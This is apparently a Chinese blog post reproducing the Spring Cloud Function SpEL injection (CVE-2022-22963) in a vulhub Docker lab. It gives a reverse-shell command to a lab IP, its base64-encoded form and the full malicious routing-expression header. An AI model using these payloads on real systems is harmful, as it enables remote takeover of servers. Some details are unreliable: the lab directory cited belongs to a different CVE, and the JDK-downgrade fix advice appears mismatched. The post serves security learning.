漏洞复现笔记(CVE-2022-22963)

最新推荐文章于 2024-08-14 22:10:41 发布
最新推荐文章于 2024-08-14 22:10:41 发布
阅读量254 收藏 5
点赞数 4
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72760965/article/details/139680622
版权

漏洞描述

Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

漏洞简介

由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。

环境搭建

  • 进入靶场

  • cd vulhub/spring/CVE-2022-22947

  • 开启靶场

  • docker-compose up -d

  • 查看靶场信息

  • docker ps

  • 访问网址

  • http://youip:8080

漏洞复现

漏洞验证
访问/port/fuctionRouter抓包
更改为post包,添加post信息

反弹shell

开监听
nc -lvvp 6666

直接执行反弹shell命令

  • bash -i >& /dev/tcp/192.168.198.129/6666 0>&1

  • YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OC4xMjkvNjY2NiAwPiYx

  • bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OC4xMjkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

  • spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OC4xMjkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}")

发送执行


关闭容器

docker-compose down

修复建议

1、安装官方的补丁
2、降级到 JDK 8 或更低版本,这将消除被攻击的可能性。

纪瑾
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-26923域权限提升漏洞复现
ordar123的博客
05-27 1108
本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA 环境搭建 域控 选择一台winserver2016搭建域控服务,这里是winserver2016。选择Active Directory 域服务,其他默认即可。 安装完成之后,提升为域控制器,开始配置域控。 添加新林rangenet.cn,其他默认,然后一步步到安装完成。 ADCS搭建 下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。 服务器管理器–>添
cve-2022-26923漏洞复现+实战+踩坑记录
恒安嘉新66的博客
06-11 2737
一、描述cve-2022-26923域内权限提升漏洞,5月份以前的存在证书服务器的通杀域控管理员权限,危害巨大。 #域控漏洞 #域控证书漏洞
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3039
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
vluhub漏洞复现笔记CVE-2022-22965:Spring Framework
weixin_46497491的博客
02-09 529
vluhub漏洞复现笔记CVE-2022-22965:Spring Framework
漏洞复现笔记CVE-2021-44228)
weixin_72760965的博客
06-14 939
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。影响版本受影响组件:环境搭建使用vulhub搭建靶场需要docker环境访问系统。
CVE-2022-22963漏洞复现
Tender*的博客
08-10 348
是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。由于中,RoutingFunction类的apply方法将请求头中的参 数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。拉取环境发送如下数据包,expression头中包含的SpEL表达式将会被执行:网页 有ip 说明存在漏洞
漏洞复现笔记CVE-2020-1938)
weixin_72760965的博客
06-14 295
cve-2020-1938是一个出现在Apache-Tomcat-Ajp的文件包含漏洞,攻击者可以利用该漏洞读取包含Tomcat上所有的webapp目录下的任意文件,如:webapp配置文件或源代码。对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。通过nmap扫出开放端口:8080,8009,并且8009端口的AJP协议是开启的。然后直接通过exp读取。
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6004
通过exp实现了对微软目前存在的office-word-2016的成功复现
Zabbix登录绕过漏洞复现CVE-2022-23131)
zxcvbnmasdflzl的博客
09-11 841
最近在复现zabbix的漏洞CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析(CVE-2022-22963) SpringCloud Function 是 Spring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
C++笔记5•内存管理•
qq_64446190的博客
08-12 1100
内存管理
谷粒商城实战笔记-175~177-商城业务-检索服务-检索查询接口开发
epitomizelu的专栏
08-13 751
搜索页面搭建完成之后,点击搜索按钮,发送参数给后台服务,后台服务根据参数从Elasticsearch中查询符合条件的数据,返回给前端。
经验笔记:URI、URL、URN与URC之间的区别
最新发布
qq_45831414的博客
08-14 529
URI是一种通用的标识符,可以指代任何类型的资源。URL是一种特定类型的URI,它不仅标识资源,还提供了访问该资源的方法。URN是一种用于唯一命名资源的特殊URI类型。URC是一个概念性的术语,用于描述如何构建或创建资源的过程。通过理解这些概念的区别,我们可以更加清晰地识别和使用互联网资源的标识方式。在日常工作中,我们最常遇到的是URL,因为它们是我们访问网页和其他在线资源的基础;而URN则在需要持久引用资源的情况下使用。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值